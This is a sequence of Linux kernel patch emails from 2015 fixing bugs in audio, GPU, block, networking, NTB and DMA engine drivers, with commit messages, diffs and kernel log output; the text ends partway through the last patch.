Signed-off-by: Takashi Iwai --- include/sound/hda_regmap.h | 2 ++ sound/hda/hdac_regmap.c | 5 +++++ sound/pci/hda/hda_codec.c | 25 +++++++++++++++++++++++++ sound/pci/hda/hda_local.h | 4 ++-- 4 files changed, 34 insertions(+), 2 deletions(-) diff --git a/include/sound/hda_regmap.h b/include/sound/hda_regmap.h index 53a18b3635e2..df705908480a 100644 --- a/include/sound/hda_regmap.h +++ b/include/sound/hda_regmap.h @@ -9,6 +9,8 @@ #include #include +#define AC_AMP_FAKE_MUTE 0x10 /* fake mute bit set to amp verbs */ + int snd_hdac_regmap_init(struct hdac_device *codec); void snd_hdac_regmap_exit(struct hdac_device *codec); int snd_hdac_regmap_add_vendor_verb(struct hdac_device *codec, diff --git a/sound/hda/hdac_regmap.c b/sound/hda/hdac_regmap.c index c4f5e61d4404..1eabcdf69457 100644 --- a/sound/hda/hdac_regmap.c +++ b/sound/hda/hdac_regmap.c @@ -246,6 +246,9 @@ static int hda_reg_read(void *context, unsigned int reg, unsigned int *val) return hda_reg_read_stereo_amp(codec, reg, val); if (verb == AC_VERB_GET_PROC_COEF) return hda_reg_read_coef(codec, reg, val); + if ((verb & 0x700) == AC_VERB_SET_AMP_GAIN_MUTE) + reg &= ~AC_AMP_FAKE_MUTE; + err = snd_hdac_exec_verb(codec, reg, 0, val); if (err < 0) return err; @@ -283,6 +286,8 @@ static int hda_reg_write(void *context, unsigned int reg, unsigned int val) switch (verb & 0xf00) { case AC_VERB_SET_AMP_GAIN_MUTE: + if ((reg & AC_AMP_FAKE_MUTE) && (val & AC_AMP_MUTE)) + val = 0; verb = AC_VERB_SET_AMP_GAIN_MUTE; if (reg & AC_AMP_GET_LEFT) verb |= AC_AMP_SET_LEFT >> 8; diff --git a/sound/pci/hda/hda_codec.c b/sound/pci/hda/hda_codec.c index b7782212dd64..5645481af3d9 100644 --- a/sound/pci/hda/hda_codec.c +++ b/sound/pci/hda/hda_codec.c @@ -1375,6 +1375,31 @@ int snd_hda_override_amp_caps(struct hda_codec *codec, hda_nid_t nid, int dir, } EXPORT_SYMBOL_GPL(snd_hda_override_amp_caps); +/** + * snd_hda_codec_amp_update - update the AMP mono value + * @codec: HD-audio codec + * @nid: NID to read the AMP value + * @ch: channel to update (0 or 1) + * @dir: #HDA_INPUT or #HDA_OUTPUT + * @idx: the index value (only for input direction) + * @mask: bit mask to set + * @val: the bits value to set + * + * Update the AMP values for the given channel, direction and index. 
+ */ +int snd_hda_codec_amp_update(struct hda_codec *codec, hda_nid_t nid, + int ch, int dir, int idx, int mask, int val) +{ + unsigned int cmd = snd_hdac_regmap_encode_amp(nid, ch, dir, idx); + + /* enable fake mute if no h/w mute but min=mute */ + if ((query_amp_caps(codec, nid, dir) & + (AC_AMPCAP_MUTE | AC_AMPCAP_MIN_MUTE)) == AC_AMPCAP_MIN_MUTE) + cmd |= AC_AMP_FAKE_MUTE; + return snd_hdac_regmap_update_raw(&codec->core, cmd, mask, val); +} +EXPORT_SYMBOL_GPL(snd_hda_codec_amp_update); + /** * snd_hda_codec_amp_stereo - update the AMP stereo values * @codec: HD-audio codec diff --git a/sound/pci/hda/hda_local.h b/sound/pci/hda/hda_local.h index 3b567f42296b..bed66c314431 100644 --- a/sound/pci/hda/hda_local.h +++ b/sound/pci/hda/hda_local.h @@ -129,8 +129,8 @@ int snd_hda_mixer_amp_switch_put_beep(struct snd_kcontrol *kcontrol, /* lowlevel accessor with caching; use carefully */ #define snd_hda_codec_amp_read(codec, nid, ch, dir, idx) \ snd_hdac_regmap_get_amp(&(codec)->core, nid, ch, dir, idx) -#define snd_hda_codec_amp_update(codec, nid, ch, dir, idx, mask, val) \ - snd_hdac_regmap_update_amp(&(codec)->core, nid, ch, dir, idx, mask, val) +int snd_hda_codec_amp_update(struct hda_codec *codec, hda_nid_t nid, + int ch, int dir, int idx, int mask, int val); int snd_hda_codec_amp_stereo(struct hda_codec *codec, hda_nid_t nid, int dir, int idx, int mask, int val); int snd_hda_codec_amp_init(struct hda_codec *codec, hda_nid_t nid, int ch, From ebaad1322d8080a1a8367ec631b345405d9879e2 Mon Sep 17 00:00:00 2001 From: Daniel Verkamp Date: Wed, 13 May 2015 15:50:04 -0700 Subject: [PATCH 825/872] ntb: initialize max_mw for Atom before using it Commit ab760a0 (ntb: Adding split BAR support for Haswell platforms) changed ntb_device's mw from a fixed-size array into a pointer that is allocated based on limits.max_mw; however, on Atom platforms, max_mw is not initialized until ntb_device_setup(), which happens after the allocation. Fill out max_mw in ntb_atom_detect() to match ntb_xeon_detect(); this happens before the use of max_mw in the ndev->mw allocation. Fixes a null pointer dereference on Atom platforms with ntb hardware. v2: fix typo (mw_max should be max_mw) Signed-off-by: Daniel Verkamp Acked-by: Dave Jiang Signed-off-by: Jon Mason --- drivers/ntb/ntb_hw.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/ntb/ntb_hw.c b/drivers/ntb/ntb_hw.c index b5c8707f4ac7..15f9b7c9e4d3 100644 --- a/drivers/ntb/ntb_hw.c +++ b/drivers/ntb/ntb_hw.c @@ -1660,6 +1660,7 @@ static int ntb_atom_detect(struct ntb_device *ndev) u32 ppd; ndev->hw_type = BWD_HW; + ndev->limits.max_mw = BWD_MAX_MW; rc = pci_read_config_dword(ndev->pdev, NTB_PPD_OFFSET, &ppd); if (rc) From 108029323910c5dd1ef8fa2d10da1ce5fbce6e12 Mon Sep 17 00:00:00 2001 From: Wang Long Date: Wed, 10 Jun 2015 08:12:37 +0000 Subject: [PATCH 826/872] ring-buffer-benchmark: Fix the wrong sched_priority of producer The producer should use producer_fifo as its sched_priority, so correct it.
Link: http://lkml.kernel.org/r/1433923957-67842-1-git-send-email-long.wanglong@huawei.com Cc: stable@vger.kernel.org # 2.6.33+ Signed-off-by: Wang Long Signed-off-by: Steven Rostedt --- kernel/trace/ring_buffer_benchmark.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/kernel/trace/ring_buffer_benchmark.c b/kernel/trace/ring_buffer_benchmark.c index 13d945c0d03f..1b28df2d9104 100644 --- a/kernel/trace/ring_buffer_benchmark.c +++ b/kernel/trace/ring_buffer_benchmark.c @@ -450,7 +450,7 @@ static int __init ring_buffer_benchmark_init(void) if (producer_fifo >= 0) { struct sched_param param = { - .sched_priority = consumer_fifo + .sched_priority = producer_fifo }; sched_setscheduler(producer, SCHED_FIFO, ¶m); } else From 6dfd197283bffc23a2b046a7f065588de7e1fc1e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?J=C3=A9r=C3=B4me=20Glisse?= Date: Fri, 5 Jun 2015 13:33:57 -0400 Subject: [PATCH 827/872] drm/radeon: fix freeze for laptop with Turks/Thames GPU. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Laptop with Turks/Thames GPU will freeze if dpm is enabled. It seems the SMC engine is relying on some state inside the CP engine. CP needs to chew at least one packet for it to get in good state for dynamic power management. This patch simply disabled and re-enable DPM after the ring test which is enough to avoid the freeze. Signed-off-by: Jérôme Glisse Cc: stable@vger.kernel.org Signed-off-by: Alex Deucher --- drivers/gpu/drm/radeon/radeon_device.c | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/drivers/gpu/drm/radeon/radeon_device.c b/drivers/gpu/drm/radeon/radeon_device.c index b7ca4c514621..a7fdfa4f0857 100644 --- a/drivers/gpu/drm/radeon/radeon_device.c +++ b/drivers/gpu/drm/radeon/radeon_device.c @@ -1463,6 +1463,21 @@ int radeon_device_init(struct radeon_device *rdev, if (r) DRM_ERROR("ib ring test failed (%d).\n", r); + /* + * Turks/Thames GPU will freeze whole laptop if DPM is not restarted + * after the CP ring have chew one packet at least. Hence here we stop + * and restart DPM after the radeon_ib_ring_tests(). + */ + if (rdev->pm.dpm_enabled && + (rdev->pm.pm_method == PM_METHOD_DPM) && + (rdev->family == CHIP_TURKS) && + (rdev->flags & RADEON_IS_MOBILITY)) { + mutex_lock(&rdev->pm.mutex); + radeon_dpm_disable(rdev); + radeon_dpm_enable(rdev); + mutex_unlock(&rdev->pm.mutex); + } + if ((radeon_testing & 1)) { if (rdev->accel_working) radeon_test_moves(rdev); From 6fb3c025fee16f11ebd73f84f5aba1ee9ce7f8c6 Mon Sep 17 00:00:00 2001 From: Alex Deucher Date: Wed, 10 Jun 2015 01:29:14 -0400 Subject: [PATCH 828/872] Revert "drm/radeon: don't share plls if monitors differ in audio support" This reverts commit a10f0df0615abb194968fc08147f3cdd70fd5aa5. Fixes some systems at the expense of others. Need to properly fix the pll divider selection. 
bug: https://bugzilla.kernel.org/show_bug.cgi?id=99651 Cc: stable@vger.kernel.org --- drivers/gpu/drm/radeon/atombios_crtc.c | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/drivers/gpu/drm/radeon/atombios_crtc.c b/drivers/gpu/drm/radeon/atombios_crtc.c index e597ffc26563..42b2ea3fdcf3 100644 --- a/drivers/gpu/drm/radeon/atombios_crtc.c +++ b/drivers/gpu/drm/radeon/atombios_crtc.c @@ -1798,9 +1798,7 @@ static int radeon_get_shared_nondp_ppll(struct drm_crtc *crtc) if ((crtc->mode.clock == test_crtc->mode.clock) && (adjusted_clock == test_adjusted_clock) && (radeon_crtc->ss_enabled == test_radeon_crtc->ss_enabled) && - (test_radeon_crtc->pll_id != ATOM_PPLL_INVALID) && - (drm_detect_monitor_audio(radeon_connector_edid(test_radeon_crtc->connector)) == - drm_detect_monitor_audio(radeon_connector_edid(radeon_crtc->connector)))) + (test_radeon_crtc->pll_id != ATOM_PPLL_INVALID)) return test_radeon_crtc->pll_id; } } From ebb9bf18636926d5da97136c22e882c5d91fda73 Mon Sep 17 00:00:00 2001 From: Alex Deucher Date: Wed, 10 Jun 2015 01:30:54 -0400 Subject: [PATCH 829/872] Revert "drm/radeon: adjust pll when audio is not enabled" This reverts commit 7fe04d6fa824ccea704535a597dc417c8687f990. Fixes some systems at the expense of others. Need to properly fix the pll divider selection. bug: https://bugzilla.kernel.org/show_bug.cgi?id=99651 Cc: stable@vger.kernel.org --- drivers/gpu/drm/radeon/atombios_crtc.c | 3 --- 1 file changed, 3 deletions(-) diff --git a/drivers/gpu/drm/radeon/atombios_crtc.c b/drivers/gpu/drm/radeon/atombios_crtc.c index 42b2ea3fdcf3..dac78ad24b31 100644 --- a/drivers/gpu/drm/radeon/atombios_crtc.c +++ b/drivers/gpu/drm/radeon/atombios_crtc.c @@ -580,9 +580,6 @@ static u32 atombios_adjust_pll(struct drm_crtc *crtc, else radeon_crtc->pll_flags |= RADEON_PLL_PREFER_LOW_REF_DIV; - /* if there is no audio, set MINM_OVER_MAXP */ - if (!drm_detect_monitor_audio(radeon_connector_edid(connector))) - radeon_crtc->pll_flags |= RADEON_PLL_PREFER_MINM_OVER_MAXP; if (rdev->family < CHIP_RV770) radeon_crtc->pll_flags |= RADEON_PLL_PREFER_MINM_OVER_MAXP; /* use frac fb div on APUs */ From ee18e599251ed06bf0c8ade7c434a0de311342ca Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Michel=20D=C3=A4nzer?= Date: Thu, 11 Jun 2015 18:38:38 +0900 Subject: [PATCH 830/872] drm/radeon: Make sure radeon_vm_bo_set_addr always unreserves the BO MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Some error paths didn't unreserve the BO. This resulted in a deadlock down the road on the next attempt to reserve the (still reserved) BO. 
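The shape of the fix is the usual single-exit error path: every failure branch funnels through one label that drops the reservation before returning. A minimal, self-contained sketch of the pattern (stand-in types and helpers, not the radeon API):

#include <errno.h>

struct bo { int reserved; };

static int bo_reserve(struct bo *b)   { b->reserved = 1; return 0; }
static void bo_unreserve(struct bo *b) { b->reserved = 0; }

static int set_addr(struct bo *b, unsigned long soffset, unsigned long eoffset)
{
	int r;

	r = bo_reserve(b);
	if (r)
		return r;

	if (soffset >= eoffset) {	/* invalid range */
		r = -EINVAL;
		goto error_unreserve;
	}

	/* ... real work would go here ... */

	bo_unreserve(b);
	return 0;

error_unreserve:
	bo_unreserve(b);		/* never return with the BO still reserved */
	return r;
}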
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=90873 Cc: stable@vger.kernel.org Reviewed-by: Christian König Signed-off-by: Michel Dänzer Signed-off-by: Alex Deucher --- drivers/gpu/drm/radeon/radeon_vm.c | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/drivers/gpu/drm/radeon/radeon_vm.c b/drivers/gpu/drm/radeon/radeon_vm.c index de42fc4a22b8..9c3377ca17b7 100644 --- a/drivers/gpu/drm/radeon/radeon_vm.c +++ b/drivers/gpu/drm/radeon/radeon_vm.c @@ -458,14 +458,16 @@ int radeon_vm_bo_set_addr(struct radeon_device *rdev, /* make sure object fit at this offset */ eoffset = soffset + size; if (soffset >= eoffset) { - return -EINVAL; + r = -EINVAL; + goto error_unreserve; } last_pfn = eoffset / RADEON_GPU_PAGE_SIZE; if (last_pfn > rdev->vm_manager.max_pfn) { dev_err(rdev->dev, "va above limit (0x%08X > 0x%08X)\n", last_pfn, rdev->vm_manager.max_pfn); - return -EINVAL; + r = -EINVAL; + goto error_unreserve; } } else { @@ -486,7 +488,8 @@ int radeon_vm_bo_set_addr(struct radeon_device *rdev, "(bo %p 0x%010lx 0x%010lx)\n", bo_va->bo, soffset, tmp->bo, tmp->it.start, tmp->it.last); mutex_unlock(&vm->mutex); - return -EINVAL; + r = -EINVAL; + goto error_unreserve; } } @@ -497,7 +500,8 @@ int radeon_vm_bo_set_addr(struct radeon_device *rdev, tmp = kzalloc(sizeof(struct radeon_bo_va), GFP_KERNEL); if (!tmp) { mutex_unlock(&vm->mutex); - return -ENOMEM; + r = -ENOMEM; + goto error_unreserve; } tmp->it.start = bo_va->it.start; tmp->it.last = bo_va->it.last; @@ -555,7 +559,6 @@ int radeon_vm_bo_set_addr(struct radeon_device *rdev, r = radeon_vm_clear_bo(rdev, pt); if (r) { radeon_bo_unref(&pt); - radeon_bo_reserve(bo_va->bo, false); return r; } @@ -575,6 +578,10 @@ int radeon_vm_bo_set_addr(struct radeon_device *rdev, mutex_unlock(&vm->mutex); return 0; + +error_unreserve: + radeon_bo_unreserve(bo_va->bo); + return r; } /** From 4d66e5e9b6d720d8463e11d027bd4ad91c8b1318 Mon Sep 17 00:00:00 2001 From: Dan Williams Date: Wed, 10 Jun 2015 23:47:14 -0400 Subject: [PATCH 831/872] block: fix ext_dev_lock lockdep report ================================= [ INFO: inconsistent lock state ] 4.1.0-rc7+ #217 Tainted: G O --------------------------------- inconsistent {SOFTIRQ-ON-W} -> {IN-SOFTIRQ-W} usage. swapper/6/0 [HC0[0]:SC1[1]:HE1:SE0] takes: (ext_devt_lock){+.?...}, at: [] blk_free_devt+0x3c/0x70 {SOFTIRQ-ON-W} state was registered at: [] __lock_acquire+0x461/0x1e70 [] lock_acquire+0xb7/0x290 [] _raw_spin_lock+0x38/0x50 [] blk_alloc_devt+0x6d/0xd0 <-- take the lock in process context [..] [] __lock_acquire+0x3fe/0x1e70 [] ? __lock_acquire+0xe5d/0x1e70 [] lock_acquire+0xb7/0x290 [] ? blk_free_devt+0x3c/0x70 [] _raw_spin_lock+0x38/0x50 [] ? blk_free_devt+0x3c/0x70 [] blk_free_devt+0x3c/0x70 <-- take the lock in softirq [] part_release+0x1c/0x50 [] device_release+0x36/0xb0 [] kobject_cleanup+0x7b/0x1a0 [] kobject_put+0x30/0x70 [] put_device+0x17/0x20 [] delete_partition_rcu_cb+0x16c/0x180 [] ? read_dev_sector+0xa0/0xa0 [] rcu_process_callbacks+0x2ff/0xa90 [] ? rcu_process_callbacks+0x2bf/0xa90 [] __do_softirq+0xde/0x600 Neil sees this in his tests and it also triggers on pmem driver unbind for the libnvdimm tests. This fix is on top of an initial fix by Keith for incorrect usage of mutex_lock() in this path: 2da78092dda1 "block: Fix dev_t minor allocation lifetime". Both this and 2da78092dda1 are candidates for -stable. 
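The rule the splat enforces: a spinlock that is also taken from softirq context (here, the RCU callback that releases a partition) must disable bottom halves whenever it is taken in process context, otherwise a softirq arriving on the same CPU can spin forever on a lock that CPU already holds. A generic sketch of the convention (not the genhd code itself):

#include <linux/spinlock.h>

static DEFINE_SPINLOCK(shared_lock);

/* process context, e.g. the allocation path */
static void alloc_side(void)
{
	spin_lock_bh(&shared_lock);	/* keep softirqs away while held */
	/* ... allocate an id ... */
	spin_unlock_bh(&shared_lock);
}

/* softirq context, e.g. an RCU callback freeing the object */
static void free_side(void)
{
	spin_lock(&shared_lock);	/* already running with BHs disabled */
	/* ... remove the id ... */
	spin_unlock(&shared_lock);
}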
Fixes: 2da78092dda1 ("block: Fix dev_t minor allocation lifetime") Cc: Cc: Keith Busch Reported-by: NeilBrown Signed-off-by: Dan Williams Signed-off-by: Jens Axboe --- block/genhd.c | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/block/genhd.c b/block/genhd.c index 666e11b83983..ea982eadaf63 100644 --- a/block/genhd.c +++ b/block/genhd.c @@ -422,9 +422,9 @@ int blk_alloc_devt(struct hd_struct *part, dev_t *devt) /* allocate ext devt */ idr_preload(GFP_KERNEL); - spin_lock(&ext_devt_lock); + spin_lock_bh(&ext_devt_lock); idx = idr_alloc(&ext_devt_idr, part, 0, NR_EXT_DEVT, GFP_NOWAIT); - spin_unlock(&ext_devt_lock); + spin_unlock_bh(&ext_devt_lock); idr_preload_end(); if (idx < 0) @@ -449,9 +449,9 @@ void blk_free_devt(dev_t devt) return; if (MAJOR(devt) == BLOCK_EXT_MAJOR) { - spin_lock(&ext_devt_lock); + spin_lock_bh(&ext_devt_lock); idr_remove(&ext_devt_idr, blk_mangle_minor(MINOR(devt))); - spin_unlock(&ext_devt_lock); + spin_unlock_bh(&ext_devt_lock); } } @@ -690,13 +690,13 @@ struct gendisk *get_gendisk(dev_t devt, int *partno) } else { struct hd_struct *part; - spin_lock(&ext_devt_lock); + spin_lock_bh(&ext_devt_lock); part = idr_find(&ext_devt_idr, blk_mangle_minor(MINOR(devt))); if (part && get_disk(part_to_disk(part))) { *partno = part->partno; disk = part_to_disk(part); } - spin_unlock(&ext_devt_lock); + spin_unlock_bh(&ext_devt_lock); } return disk; From b6f2098fb708ce935a59763178c4e8cd942fcf88 Mon Sep 17 00:00:00 2001 From: Richard Weinberger Date: Mon, 4 May 2015 20:58:57 +0200 Subject: [PATCH 832/872] block: pmem: Add dependency on HAS_IOMEM MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Not all architectures have io memory. Fixes: drivers/block/pmem.c: In function ‘pmem_alloc’: drivers/block/pmem.c:146:2: error: implicit declaration of function ‘ioremap_nocache’ [-Werror=implicit-function-declaration] pmem->virt_addr = ioremap_nocache(pmem->phys_addr, pmem->size); ^ drivers/block/pmem.c:146:18: warning: assignment makes pointer from integer without a cast [enabled by default] pmem->virt_addr = ioremap_nocache(pmem->phys_addr, pmem->size); ^ drivers/block/pmem.c:182:2: error: implicit declaration of function ‘iounmap’ [-Werror=implicit-function-declaration] iounmap(pmem->virt_addr); ^ Signed-off-by: Richard Weinberger Reviewed-by: Ross Zwisler Signed-off-by: Jens Axboe --- drivers/block/Kconfig | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/block/Kconfig b/drivers/block/Kconfig index eb1fed5bd516..3ccef9eba6f9 100644 --- a/drivers/block/Kconfig +++ b/drivers/block/Kconfig @@ -406,6 +406,7 @@ config BLK_DEV_RAM_DAX config BLK_DEV_PMEM tristate "Persistent memory block device support" + depends on HAS_IOMEM help Saying Y here will allow you to use a contiguous range of reserved memory as one or more persistent block devices. From 58c98be137830d34b79024cc5dc95ef54fcd7ffe Mon Sep 17 00:00:00 2001 From: Richard Cochran Date: Thu, 11 Jun 2015 14:51:30 +0200 Subject: [PATCH 833/872] net: igb: fix the start time for periodic output signals When programming the start of a periodic output, the code wrongly places the seconds value into the "low" register and the nanoseconds into the "high" register. Even though this is backwards, it slipped through my testing, because the re-arming code in the interrupt service routine is correct, and the signal does appear starting with the second edge. This patch fixes the issue by programming the registers correctly. 
Signed-off-by: Richard Cochran Reviewed-by: Jacob Keller Acked-by: Jeff Kirsher Signed-off-by: David S. Miller --- drivers/net/ethernet/intel/igb/igb_ptp.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/ethernet/intel/igb/igb_ptp.c b/drivers/net/ethernet/intel/igb/igb_ptp.c index e3b9b63ad010..c3a9392cbc19 100644 --- a/drivers/net/ethernet/intel/igb/igb_ptp.c +++ b/drivers/net/ethernet/intel/igb/igb_ptp.c @@ -538,8 +538,8 @@ static int igb_ptp_feature_enable_i210(struct ptp_clock_info *ptp, igb->perout[i].start.tv_nsec = rq->perout.start.nsec; igb->perout[i].period.tv_sec = ts.tv_sec; igb->perout[i].period.tv_nsec = ts.tv_nsec; - wr32(trgttiml, rq->perout.start.sec); - wr32(trgttimh, rq->perout.start.nsec); + wr32(trgttimh, rq->perout.start.sec); + wr32(trgttiml, rq->perout.start.nsec); tsauxc |= tsauxc_mask; tsim |= tsim_mask; } else { From 0fae3bf018d97b210051c8797a49d66d31071847 Mon Sep 17 00:00:00 2001 From: Robert Shearman Date: Thu, 11 Jun 2015 19:58:26 +0100 Subject: [PATCH 834/872] mpls: handle device renames for per-device sysctls If a device is renamed and the original name is subsequently reused for a new device, the following warning is generated: sysctl duplicate entry: /net/mpls/conf/veth0//input CPU: 3 PID: 1379 Comm: ip Not tainted 4.1.0-rc4+ #20 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.7.5-20140531_083030-gandalf 04/01/2014 0000000000000000 0000000000000000 ffffffff81566aaf 0000000000000000 ffffffff81236279 ffff88002f7d7f00 0000000000000000 ffff88000db336d8 ffff88000db33698 0000000000000005 ffff88002e046000 ffff8800168c9280 Call Trace: [] ? dump_stack+0x40/0x50 [] ? __register_sysctl_table+0x289/0x5a0 [] ? mpls_dev_notify+0x1ff/0x300 [mpls_router] [] ? notifier_call_chain+0x4f/0x70 [] ? register_netdevice+0x2b2/0x480 [] ? veth_newlink+0x178/0x2d3 [veth] [] ? rtnl_newlink+0x73c/0x8e0 [] ? rtnl_newlink+0x16a/0x8e0 [] ? __kmalloc_reserve.isra.30+0x32/0x90 [] ? rtnetlink_rcv_msg+0x8d/0x250 [] ? __alloc_skb+0x47/0x1f0 [] ? __netlink_lookup+0xab/0xe0 [] ? rtnetlink_rcv+0x30/0x30 [] ? netlink_rcv_skb+0xb0/0xd0 [] ? rtnetlink_rcv+0x24/0x30 [] ? netlink_unicast+0x107/0x1a0 [] ? netlink_sendmsg+0x50e/0x630 [] ? sock_sendmsg+0x3c/0x50 [] ? ___sys_sendmsg+0x27b/0x290 [] ? mem_cgroup_try_charge+0x88/0x110 [] ? mem_cgroup_commit_charge+0x56/0xa0 [] ? do_filp_open+0x30/0xa0 [] ? __sys_sendmsg+0x3e/0x80 [] ? system_call_fastpath+0x16/0x75 Fix this by unregistering the previous sysctl table (registered for the path containing the original device name) and re-registering the table for the path containing the new device name. Fixes: 37bde79979c3 ("mpls: Per-device enabling of packet input") Reported-by: Scott Feldman Signed-off-by: Robert Shearman Signed-off-by: David S. 
Miller --- net/mpls/af_mpls.c | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/net/mpls/af_mpls.c b/net/mpls/af_mpls.c index bff427f31924..1f93a5978f2a 100644 --- a/net/mpls/af_mpls.c +++ b/net/mpls/af_mpls.c @@ -564,6 +564,17 @@ static int mpls_dev_notify(struct notifier_block *this, unsigned long event, case NETDEV_UNREGISTER: mpls_ifdown(dev); break; + case NETDEV_CHANGENAME: + mdev = mpls_dev_get(dev); + if (mdev) { + int err; + + mpls_dev_sysctl_unregister(mdev); + err = mpls_dev_sysctl_register(dev, mdev); + if (err) + return notifier_from_errno(err); + } + break; } return NOTIFY_OK; } From fb05e7a89f500cfc06ae277bdc911b281928995d Mon Sep 17 00:00:00 2001 From: Shaohua Li Date: Thu, 11 Jun 2015 16:50:48 -0700 Subject: [PATCH 835/872] net: don't wait for order-3 page allocation We saw excessive direct memory compaction triggered by skb_page_frag_refill. This causes performance issues and add latency. Commit 5640f7685831e0 introduces the order-3 allocation. According to the changelog, the order-3 allocation isn't a must-have but to improve performance. But direct memory compaction has high overhead. The benefit of order-3 allocation can't compensate the overhead of direct memory compaction. This patch makes the order-3 page allocation atomic. If there is no memory pressure and memory isn't fragmented, the alloction will still success, so we don't sacrifice the order-3 benefit here. If the atomic allocation fails, direct memory compaction will not be triggered, skb_page_frag_refill will fallback to order-0 immediately, hence the direct memory compaction overhead is avoided. In the allocation failure case, kswapd is waken up and doing compaction, so chances are allocation could success next time. alloc_skb_with_frags is the same. The mellanox driver does similar thing, if this is accepted, we must fix the driver too. V3: fix the same issue in alloc_skb_with_frags as pointed out by Eric V2: make the changelog clearer Cc: Eric Dumazet Cc: Chris Mason Cc: Debabrata Banerjee Signed-off-by: Shaohua Li Acked-by: Eric Dumazet Signed-off-by: David S. Miller --- net/core/skbuff.c | 2 +- net/core/sock.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/net/core/skbuff.c b/net/core/skbuff.c index 3cfff2a3d651..41ec02242ea7 100644 --- a/net/core/skbuff.c +++ b/net/core/skbuff.c @@ -4398,7 +4398,7 @@ struct sk_buff *alloc_skb_with_frags(unsigned long header_len, while (order) { if (npages >= 1 << order) { - page = alloc_pages(gfp_mask | + page = alloc_pages((gfp_mask & ~__GFP_WAIT) | __GFP_COMP | __GFP_NOWARN | __GFP_NORETRY, diff --git a/net/core/sock.c b/net/core/sock.c index 469d6039c7f5..dc30dc5bb1b8 100644 --- a/net/core/sock.c +++ b/net/core/sock.c @@ -1880,7 +1880,7 @@ bool skb_page_frag_refill(unsigned int sz, struct page_frag *pfrag, gfp_t gfp) pfrag->offset = 0; if (SKB_FRAG_PAGE_ORDER) { - pfrag->page = alloc_pages(gfp | __GFP_COMP | + pfrag->page = alloc_pages((gfp & ~__GFP_WAIT) | __GFP_COMP | __GFP_NOWARN | __GFP_NORETRY, SKB_FRAG_PAGE_ORDER); if (likely(pfrag->page)) { From 535115b5ff51c702a9a22feb918707c2fe1fbd17 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Fri, 12 Jun 2015 07:53:58 +0200 Subject: [PATCH 836/872] ALSA: hda - Abort the probe without i915 binding for HSW/BDW The previous patch tried to continue the probe if i915 binding fails. For for simplicity reason, we haven't implemented abort even for controller chips that are dedicated for HDMI/DP on HSW and BDW. 
However, Mengdong suggested that this can be dangerous; BIOS may disable gfx power well although the PCI entry for HD-audio is left, and this may result in the unexpected behavior, kernel errors, etc. For avoiding this situation, abort the probe at i915 binding failure only for HSW/BDW chips selectively. For other chips, it still continues. Fixes: bf06848bdbe5 ('ALSA: hda - Continue probing even if i915 binding fails') Reported-by: Mengdong Lin Signed-off-by: Takashi Iwai --- sound/pci/hda/hda_intel.c | 18 ++++++++++++++++-- 1 file changed, 16 insertions(+), 2 deletions(-) diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c index 8a0af6770e1d..a244ba706317 100644 --- a/sound/pci/hda/hda_intel.c +++ b/sound/pci/hda/hda_intel.c @@ -340,6 +340,11 @@ enum { #define use_vga_switcheroo(chip) 0 #endif +#define CONTROLLER_IN_GPU(pci) (((pci)->device == 0x0a0c) || \ + ((pci)->device == 0x0c0c) || \ + ((pci)->device == 0x0d0c) || \ + ((pci)->device == 0x160c)) + static char *driver_short_names[] = { [AZX_DRIVER_ICH] = "HDA Intel", [AZX_DRIVER_PCH] = "HDA Intel PCH", @@ -1854,8 +1859,17 @@ static int azx_probe_continue(struct azx *chip) if (chip->driver_caps & AZX_DCAPS_I915_POWERWELL) { #ifdef CONFIG_SND_HDA_I915 err = hda_i915_init(hda); - if (err < 0) - goto skip_i915; + if (err < 0) { + /* if the controller is bound only with HDMI/DP + * (for HSW and BDW), we need to abort the probe; + * for other chips, still continue probing as other + * codecs can be on the same link. + */ + if (CONTROLLER_IN_GPU(pci)) + goto out_free; + else + goto skip_i915; + } err = hda_display_power(hda, true); if (err < 0) { dev_err(chip->card->dev, From 88d04643c66052a1cf92a6fd5f92dff0f7757f61 Mon Sep 17 00:00:00 2001 From: Krzysztof Kozlowski Date: Wed, 10 Jun 2015 17:17:07 +0900 Subject: [PATCH 837/872] dmaengine: Fix choppy sound because of unimplemented resume Some drivers implement only pause operation (no resuming). Example is pl330 where pause is needed for getting residuum. pl330 does not support resume operation, transfer must be stopped after pause. However for slaves this is exposed always as "pause and resume" which introduces subtle errors on Odroid U3 board (Exynos4412 with pl330). After adding pause function to pl330 driver the audio playback (utilizing DMA) gets choppy after some time (approximately 24 hours). Fix this by exposing "cmd_pause" if and only if pause and resume are implemented. Signed-off-by: Krzysztof Kozlowski Reported-by: gabriel@unseen.is Reported-by: Marek Szyprowski Cc: Fixes: 88987d2c7534 ("dmaengine: pl330: add DMA_PAUSE feature") Acked-by: Maxime Ripard Signed-off-by: Vinod Koul --- drivers/dma/dmaengine.c | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/drivers/dma/dmaengine.c b/drivers/dma/dmaengine.c index 2890d744bb1b..3ddfd1f6c23c 100644 --- a/drivers/dma/dmaengine.c +++ b/drivers/dma/dmaengine.c @@ -487,7 +487,11 @@ int dma_get_slave_caps(struct dma_chan *chan, struct dma_slave_caps *caps) caps->directions = device->directions; caps->residue_granularity = device->residue_granularity; - caps->cmd_pause = !!device->device_pause; + /* + * Some devices implement only pause (e.g. to get residuum) but no + * resume. However cmd_pause is advertised as pause AND resume. 
